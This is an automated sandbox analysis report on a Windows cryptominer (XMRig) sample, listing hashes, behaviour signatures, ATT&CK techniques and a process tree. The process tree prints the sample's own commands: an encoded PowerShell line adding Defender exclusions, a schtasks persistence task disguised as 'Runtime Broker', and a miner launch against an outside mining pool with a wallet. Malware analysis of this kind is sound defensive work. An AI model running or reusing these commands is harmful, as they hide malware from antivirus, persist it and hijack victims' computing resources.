Analysis

  • max time kernel
    73s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    20-05-2022 05:20

General

  • Target

    a738f6016086abdd2824b797ec67feee3bc39d52b0b0ae94bd1384c58ed3d5d6.exe

  • Size

    4.8MB

  • MD5

    b4aa27a1339c69d99121a4fe4fac94f7

  • SHA1

    72cd9ebfd59e9c5a45c22dd5f6aa8d4cb9ba9d26

  • SHA256

    a738f6016086abdd2824b797ec67feee3bc39d52b0b0ae94bd1384c58ed3d5d6

  • SHA512

    3550565464695370bdc761327eea1502e523a8b5f5780c6d7942e2be480d40a262897009c6e459110ac0b146ad05f69f9c7d099ad88eaca39975907f95d3e184

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a738f6016086abdd2824b797ec67feee3bc39d52b0b0ae94bd1384c58ed3d5d6.exe
    "C:\Users\Admin\AppData\Local\Temp\a738f6016086abdd2824b797ec67feee3bc39d52b0b0ae94bd1384c58ed3d5d6.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1964
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjADgAMABkADYANgA5AGMAYwBlAGYAOQA4ADQAZgA2ADkAOQBjADkAMgA0AGUAYQA4ADgAOABiADcAYQBhAGEAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOABhAGYAOAA1AGMAMgBlAGIANAAzADQAZgBkADQAYgA4ADEAYQBhADMAYwAxAGUANwBkADcAYgBiADQANAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMANwBjAGQAYwBkADcAZgAwAGIAYwAyADQANAA4ADMANABhADYANgBlADkAOQBmADcAMwBlADcAZQA1AGQAMgA5ACMAPgAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjADMAZAAwADgAZABmAGMAYgAzADYAYgAyADQAOQA4ADcAOQBmAGIAZAAwAGEANwBjADEAZABlADgAMgAyADgANAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA5ADIANgBlADIAYgBhAGQAMQBiAGYAMQA0ADkAMQA2ADkAYwA3AGMAMwAxAGIAZQBkAGUAZgAzADcANgBmADgAIwA+AA=="
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2892
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -EncodedCommand "PAAjADgAMABkADYANgA5AGMAYwBlAGYAOQA4ADQAZgA2ADkAOQBjADkAMgA0AGUAYQA4ADgAOABiADcAYQBhAGEAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOABhAGYAOAA1AGMAMgBlAGIANAAzADQAZgBkADQAYgA4ADEAYQBhADMAYwAxAGUANwBkADcAYgBiADQANAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMANwBjAGQAYwBkADcAZgAwAGIAYwAyADQANAA4ADMANABhADYANgBlADkAOQBmADcAMwBlADcAZQA1AGQAMgA5ACMAPgAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjADMAZAAwADgAZABmAGMAYgAzADYAYgAyADQAOQA4ADcAOQBmAGIAZAAwAGEANwBjADEAZABlADgAMgAyADgANAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA5ADIANgBlADIAYgBhAGQAMQBiAGYAMQA0ADkAMQA2ADkAYwA3AGMAMwAxAGIAZQBkAGUAZgAzADcANgBmADgAIwA+AA=="
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2572
    • C:\Windows\system32\schtasks.exe
      schtasks /create /sc minute /mo 1 /tn "Runtime Broker" /rl HIGHEST /tr "C:\Users\Admin\AppData\Roaming\Runtime Broker\Runtime Broker"
      2⤵
      • Creates scheduled task(s)
      PID:4724
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:4336
  • C:\Users\Admin\AppData\Roaming\Runtime Broker\Runtime Broker
    "C:\Users\Admin\AppData\Roaming\Runtime Broker\Runtime Broker"
    1⤵
    • Executes dropped EXE
    PID:3976
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjADgAMABkADYANgA5AGMAYwBlAGYAOQA4ADQAZgA2ADkAOQBjADkAMgA0AGUAYQA4ADgAOABiADcAYQBhAGEAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOABhAGYAOAA1AGMAMgBlAGIANAAzADQAZgBkADQAYgA4ADEAYQBhADMAYwAxAGUANwBkADcAYgBiADQANAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMANwBjAGQAYwBkADcAZgAwAGIAYwAyADQANAA4ADMANABhADYANgBlADkAOQBmADcAMwBlADcAZQA1AGQAMgA5ACMAPgAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjADMAZAAwADgAZABmAGMAYgAzADYAYgAyADQAOQA4ADcAOQBmAGIAZAAwAGEANwBjADEAZABlADgAMgAyADgANAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA5ADIANgBlADIAYgBhAGQAMQBiAGYAMQA0ADkAMQA2ADkAYwA3AGMAMwAxAGIAZQBkAGUAZgAzADcANgBmADgAIwA+AA=="
      2⤵
        PID:1224
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -EncodedCommand "PAAjADgAMABkADYANgA5AGMAYwBlAGYAOQA4ADQAZgA2ADkAOQBjADkAMgA0AGUAYQA4ADgAOABiADcAYQBhAGEAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOABhAGYAOAA1AGMAMgBlAGIANAAzADQAZgBkADQAYgA4ADEAYQBhADMAYwAxAGUANwBkADcAYgBiADQANAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMANwBjAGQAYwBkADcAZgAwAGIAYwAyADQANAA4ADMANABhADYANgBlADkAOQBmADcAMwBlADcAZQA1AGQAMgA5ACMAPgAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjADMAZAAwADgAZABmAGMAYgAzADYAYgAyADQAOQA4ADcAOQBmAGIAZAAwAGEANwBjADEAZABlADgAMgAyADgANAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA5ADIANgBlADIAYgBhAGQAMQBiAGYAMQA0ADkAMQA2ADkAYwA3AGMAMwAxAGIAZQBkAGUAZgAzADcANgBmADgAIwA+AA=="
          3⤵
            PID:1960
      • C:\Users\Admin\AppData\Roaming\Runtime Broker\Runtime Broker
        "C:\Users\Admin\AppData\Roaming\Runtime Broker\Runtime Broker"
        1⤵
          PID:1764
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjADgAMABkADYANgA5AGMAYwBlAGYAOQA4ADQAZgA2ADkAOQBjADkAMgA0AGUAYQA4ADgAOABiADcAYQBhAGEAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOABhAGYAOAA1AGMAMgBlAGIANAAzADQAZgBkADQAYgA4ADEAYQBhADMAYwAxAGUANwBkADcAYgBiADQANAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMANwBjAGQAYwBkADcAZgAwAGIAYwAyADQANAA4ADMANABhADYANgBlADkAOQBmADcAMwBlADcAZQA1AGQAMgA5ACMAPgAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjADMAZAAwADgAZABmAGMAYgAzADYAYgAyADQAOQA4ADcAOQBmAGIAZAAwAGEANwBjADEAZABlADgAMgAyADgANAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA5ADIANgBlADIAYgBhAGQAMQBiAGYAMQA0ADkAMQA2ADkAYwA3AGMAMwAxAGIAZQBkAGUAZgAzADcANgBmADgAIwA+AA=="
            2⤵
              PID:1848
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -EncodedCommand "PAAjADgAMABkADYANgA5AGMAYwBlAGYAOQA4ADQAZgA2ADkAOQBjADkAMgA0AGUAYQA4ADgAOABiADcAYQBhAGEAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADQAOABhAGYAOAA1AGMAMgBlAGIANAAzADQAZgBkADQAYgA4ADEAYQBhADMAYwAxAGUANwBkADcAYgBiADQANAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMANwBjAGQAYwBkADcAZgAwAGIAYwAyADQANAA4ADMANABhADYANgBlADkAOQBmADcAMwBlADcAZQA1AGQAMgA5ACMAPgAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjADMAZAAwADgAZABmAGMAYgAzADYAYgAyADQAOQA4ADcAOQBmAGIAZAAwAGEANwBjADEAZABlADgAMgAyADgANAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA5ADIANgBlADIAYgBhAGQAMQBiAGYAMQA0ADkAMQA2ADkAYwA3AGMAMwAxAGIAZQBkAGUAZgAzADcANgBmADgAIwA+AA=="
                3⤵
                  PID:4116

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Execution

            Scheduled Task

            1
            T1053

            Persistence

            Scheduled Task

            1
            T1053

            Privilege Escalation

            Scheduled Task

            1
            T1053

            Discovery

            Query Registry

            1
            T1012

            System Information Discovery

            2
            T1082

            Command and Control

            Web Service

            1
            T1102

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
              Filesize

              2KB

              MD5

              d85ba6ff808d9e5444a4b369f5bc2730

              SHA1

              31aa9d96590fff6981b315e0b391b575e4c0804a

              SHA256

              84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

              SHA512

              8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              944B

              MD5

              e243a38635ff9a06c87c2a61a2200656

              SHA1

              ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc

              SHA256

              af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f

              SHA512

              4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              944B

              MD5

              771f6359fc8b2d2046610c3330174bc4

              SHA1

              215f804044a3be8bde587a8e6d4eb359a540ed1d

              SHA256

              7c33d8031b1f1d48d6e44e757a7cfdd5ae27eab15154b800bb9f0a61bae005d9

              SHA512

              0f197014b0f1b286f310b7145ae7650e06cd0a53c1c73b6a5b22f9552a5f71a39fb7e9e435ba18cd84aeda6c01b7bb8e0ddc22b52b08d554d1756189d1a3409d

            • C:\Users\Admin\AppData\Roaming\Runtime Broker\Runtime Broker
              Filesize

              4.8MB

              MD5

              b4aa27a1339c69d99121a4fe4fac94f7

              SHA1

              72cd9ebfd59e9c5a45c22dd5f6aa8d4cb9ba9d26

              SHA256

              a738f6016086abdd2824b797ec67feee3bc39d52b0b0ae94bd1384c58ed3d5d6

              SHA512

              3550565464695370bdc761327eea1502e523a8b5f5780c6d7942e2be480d40a262897009c6e459110ac0b146ad05f69f9c7d099ad88eaca39975907f95d3e184

            • C:\Users\Admin\AppData\Roaming\Runtime Broker\Runtime Broker
              Filesize

              4.8MB

              MD5

              b4aa27a1339c69d99121a4fe4fac94f7

              SHA1

              72cd9ebfd59e9c5a45c22dd5f6aa8d4cb9ba9d26

              SHA256

              a738f6016086abdd2824b797ec67feee3bc39d52b0b0ae94bd1384c58ed3d5d6

              SHA512

              3550565464695370bdc761327eea1502e523a8b5f5780c6d7942e2be480d40a262897009c6e459110ac0b146ad05f69f9c7d099ad88eaca39975907f95d3e184

            • C:\Users\Admin\AppData\Roaming\Runtime Broker\Runtime Broker
              Filesize

              4.8MB

              MD5

              b4aa27a1339c69d99121a4fe4fac94f7

              SHA1

              72cd9ebfd59e9c5a45c22dd5f6aa8d4cb9ba9d26

              SHA256

              a738f6016086abdd2824b797ec67feee3bc39d52b0b0ae94bd1384c58ed3d5d6

              SHA512

              3550565464695370bdc761327eea1502e523a8b5f5780c6d7942e2be480d40a262897009c6e459110ac0b146ad05f69f9c7d099ad88eaca39975907f95d3e184

            • memory/1224-145-0x0000000000000000-mapping.dmp
            • memory/1848-152-0x0000000000000000-mapping.dmp
            • memory/1960-146-0x0000000000000000-mapping.dmp
            • memory/1960-148-0x00007FFCB0340000-0x00007FFCB0E01000-memory.dmp
              Filesize

              10.8MB

            • memory/2572-133-0x00007FFCB0BC0000-0x00007FFCB1681000-memory.dmp
              Filesize

              10.8MB

            • memory/2572-132-0x0000021C54510000-0x0000021C54532000-memory.dmp
              Filesize

              136KB

            • memory/2572-131-0x0000000000000000-mapping.dmp
            • memory/2892-130-0x0000000000000000-mapping.dmp
            • memory/4116-153-0x0000000000000000-mapping.dmp
            • memory/4116-155-0x00007FFCB0340000-0x00007FFCB0E01000-memory.dmp
              Filesize

              10.8MB

            • memory/4336-136-0x00007FF6185748A0-mapping.dmp
            • memory/4336-142-0x00000000013F0000-0x0000000001430000-memory.dmp
              Filesize

              256KB

            • memory/4336-141-0x0000000000DD0000-0x0000000000DF0000-memory.dmp
              Filesize

              128KB

            • memory/4336-140-0x00007FF617D90000-0x00007FF61857C000-memory.dmp
              Filesize

              7.9MB

            • memory/4336-139-0x00007FF617D90000-0x00007FF61857C000-memory.dmp
              Filesize

              7.9MB

            • memory/4336-151-0x00000000012E0000-0x0000000001300000-memory.dmp
              Filesize

              128KB

            • memory/4336-138-0x00007FF617D90000-0x00007FF61857C000-memory.dmp
              Filesize

              7.9MB

            • memory/4336-137-0x00007FF617D90000-0x00007FF61857C000-memory.dmp
              Filesize

              7.9MB

            • memory/4336-135-0x00007FF617D90000-0x00007FF61857C000-memory.dmp
              Filesize

              7.9MB

            • memory/4724-134-0x0000000000000000-mapping.dmp